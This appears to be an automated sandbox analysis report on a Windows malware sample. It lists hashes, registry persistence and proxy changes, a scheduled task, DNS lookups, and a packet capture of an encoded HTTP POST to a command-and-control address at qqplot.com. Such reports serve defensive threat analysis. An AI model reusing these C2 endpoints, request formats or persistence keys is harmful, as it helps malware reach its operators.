Analysis Date2014-09-30 23:06:16
MD537f85872575fd0d288528e7cceb4fddf
SHA12adc37e08f2b81c5f77e162d40af733830378af5

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionCODE md5: 55926d550f2bb237066be377573390ca sha1: aa0cbd907e43ad2961a051fc735b4e2136f28734 size: 13312
SectionDATA md5: fb1be640015d1b4f8df6ea4e4481c5be sha1: 13d48731fefb97719970cf4acde195aefb3ef2bf size: 154112
SectionBSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.idata md5: 1eb915365158a1b0e0bbecfa0fb7add0 sha1: df4cd276a05a2a1b0ad2d20a73c7a03a8f354953 size: 2048
Section.edata md5: 2f866a82d6a39e0479ff858660468a41 sha1: 2136780843a4de5db50504060b3deb5349d63876 size: 512
Section.reloc md5: 6276dd8d39fea6573832745e871d8b27 sha1: 8901094916824fa560beed1d479283ce0e4a6fb1 size: 1024
Section.rsrc md5: eca8f29f807e5ed2a7e09e198483e73a sha1: d14b0bd5cc030e7732c977f110fc16ffd946d45b size: 1024
Timestamp1992-06-19 22:22:17
PEhasheb23b11017750228bb69d904dbc17a89724fecb9
IMPhashd1d53603936afe83b9f03c34b2adcf44

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Q7NZMT7RLB ➝
C:\malware.exe
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Q7NZMT7RLB\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNSlacvictoria.com
Winsock DNSqqplot.com

Network Details:

DNSwp.pl
Type: A
212.77.100.101
DNSspankwire.com
Type: A
94.199.252.72
DNS51.la
Type: A
117.21.226.199
DNSqqplot.com
Type: A
109.74.195.149
DNSlacvictoria.com
Type: A
DNSpaulo-fg.com
Type: A
DNSbonreligion.com
Type: A
HTTP POSThttp://qqplot.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 109.74.195.149:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   7171706c 6f742e63 6f6d0d0a 436f6e74   qqplot.com..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3334310d   ent-Length: 341.
0x000000c0 (00192)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x000000d0 (00208)   702d416c 6976650d 0a436163 68652d43   p-Alive..Cache-C
0x000000e0 (00224)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x000000f0 (00240)   0d0a0d0a 64617461 3d2f436a 45665a44   ....data=/CjEfZD
0x00000100 (00256)   53767871 43694b30 6c74554d 31757932   SvxqCiK0ltUM1uy2
0x00000110 (00272)   2f797534 55355970 4e6d3176 2f2f6a54   /yu4U5YpNm1v//jT
0x00000120 (00288)   6e675663 2b774d73 2b2b5a42 6a375a53   ngVc+wMs++ZBj7ZS
0x00000130 (00304)   59547233 69426b47 2f672b37 5643432f   YTr3iBkG/g+7VCC/
0x00000140 (00320)   3070426a 674f4870 37655263 48506959   0pBjgOHp7eRcHPiY
0x00000150 (00336)   6f393949 4d55756a 67555734 62765449   o99IMUujgUW4bvTI
0x00000160 (00352)   644e2f6a 50587547 506a6142 7a786c63   dN/jPXuGPjaBzxlc
0x00000170 (00368)   63356d70 4e303161 36742f51 69535858   c5mpN01a6t/QiSXX
0x00000180 (00384)   77707a39 486d306b 7a396642 6661556e   wpz9Hm0kz9fBfaUn
0x00000190 (00400)   3130782f 474c636f 66526948 344c7646   10x/GLcofRiH4LvF
0x000001a0 (00416)   73416947 59467361 696f4d57 30374b30   sAiGYFsaioMW07K0
0x000001b0 (00432)   4533726b 6b334d65 5a557967 44654c47   E3rkk3MeZUygDeLG
0x000001c0 (00448)   77327331 322b6f50 4d4e726e 4a5a637a   w2s12+oPMNrnJZcz
0x000001d0 (00464)   687a5a38 78694e57 75355467 4f687134   hzZ8xiNWu5TgOhq4
0x000001e0 (00480)   4f715553 30424d54 644b3262 5a792f68   OqUS0BMTdK2bZy/h
0x000001f0 (00496)   7833546e 6d477954 464c4868 4c635266   x3TnmGyTFLHhLcRf
0x00000200 (00512)   2b76417a 494f424e 6d763433 43444b32   +vAzIOBNmv43CDK2
0x00000210 (00528)   51303541 56636d41 38324b68 54665573   Q05AVcmA82KhTfUs
0x00000220 (00544)   732f476f 6c77786c 6d396b4c 6e726e6c   s/Golwxlm9kLnrnl
0x00000230 (00560)   492b3567 366e3336 642f3334 6b6f4656   I+5g6n36d/34koFV
0x00000240 (00576)   30614b51 692f513d 3d                  0aKQi/Q==


Strings
7.4|:qU..
..L&.....
f@.Q.!....
..J.2..
<
.MA...h
.D
I~
.+..|r.#;...7(..
,sq.C

~$$,
,0RN
10'Y
2"0=
@2dI
45]@
4e"B&
5##?
75PT
~7!j
7pl3
9D+Y
^	$a
^A8d
}axU
b,48
b'qe
\{ce
^@cw
DMcL
efsV
EQ=n
ETU{
}EY!
f4`[
fB:|
\F"t
Gc[^
g_#l
gx(~>
hmBC
h,TY
IFN8
J,:G
jzt#
k3#2
kC8q
Ki=a
KISb
lm4W<
mHmc
M|r-
N5I')
@!;O
O8Kz
O)Cd
>!oH)
o'L;5
+P?6n
p}B%
qb6 
qK*w
Qy}6
} R`	
R&,=
+	rH_
'r'O
!+rV
|$ @S
s9N$cj
 T?i
?-.U7I
Un_rJ
=uU^
>V{fm
&wtiQ
w	^Wa
XO'\%
Y9G)o
ypQ?
0$0*00060<0B0H0N0T0Z0`0f0l0r0x0~0
0T\p#k
0<u---
120983218
2"2*222:2B2J2R2Z2b2r2z2
283>3(4
3"3*323:3B3J3R3Z3b3j3r3z3
?4?:?@?F?L?R?X?^?d?j?p?v?|?
6n6u6,9s9
6N7c7t7
8,889?9!;(;Y=`=p=
8cc3866
AbortDoc
accept
  </application> 
  <application> 
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Windows Setup UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
B:]0{#f
BringWindowToTop
CallNamedPipeA
ChildWindowFromPoint
</compatibility> 
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> 
CopyFileExA
CopyFileExW
CreateFileW
CreateHardLinkW
D9H9L9P9T9X9\9x9|9
DefFrameProcW
DEfggy0
DestroyCaret
.edata
EqualRect
FlushConsoleInputBuffer
gdi32.dll
GetFileSizeEx
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetFileVersionInfoSizeW
GetModuleHandleA
getnameinfo
GetProcAddress
GetSysColorBrush
GetSystemDefaultLCID
GetWindowTextA
GetWindowThreadProcessId
;H<O<Q=
.idata
inet_addr
IntersectRect
kernel32.dll
"~l.---
LoadLibraryA
LocalAlloc
LocalFree
LWX~Cp
OffsetRect
OpenAs_RunDLLW
O+q}4X1
:+:<:P:{:
PathMakeUniqueName
PifMgr_CloseProperties
P.reloc
P.rsrc
PtInRect
regapi.dll
RegenerateUserEnvironment
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
>S6^tu
      </security>
      <security>
SetLocaleInfoW
SetWindowTextA
SHChangeNotifyDeregister
shell32.dll
ShellExec_RunDLLW
SHFileOperation
SHFlushSFCache
SHGetNewLinkInfoA
SHOpenPropSheetW
SHPathPrepareForWriteW
SHSimpleIDListFromPath
sNHLs3bb
StrChrIW
StrCmpNIW
StringX
      <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> 
      <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> 
TerminateProcess
    <!--The ID below indicates application support for Windows 7 --> 
    <!--The ID below indicates application support for Windows Vista --> 
This program must be run under Win32
Ti, W~
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
UnionRect
user32.dll
VerFindFileA
VerInstallFileA
VerLanguageNameA
VerQueryValueA
VerQueryValueW
version.dll
VirtualAllocEx
WIQr(cb
ws2_32.dll
WSAAsyncGetHostByName
WSACloseEvent
WSAConnect
WSAEnumNetworkEvents
WSAEventSelect
WSAHtonl
WSCInstallNameSpace
wtsapi32.dll
WTSEnumerateProcessesA
WTSEnumerateServersA
WTSEnumerateSessionsA
WTSLogoffSession
WTSOpenServerA
WTSQuerySessionInformationW
WTSVirtualChannelRead
WTSWaitSystemEvent
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
"$	XU7
!z9 +4
Z^xonXDI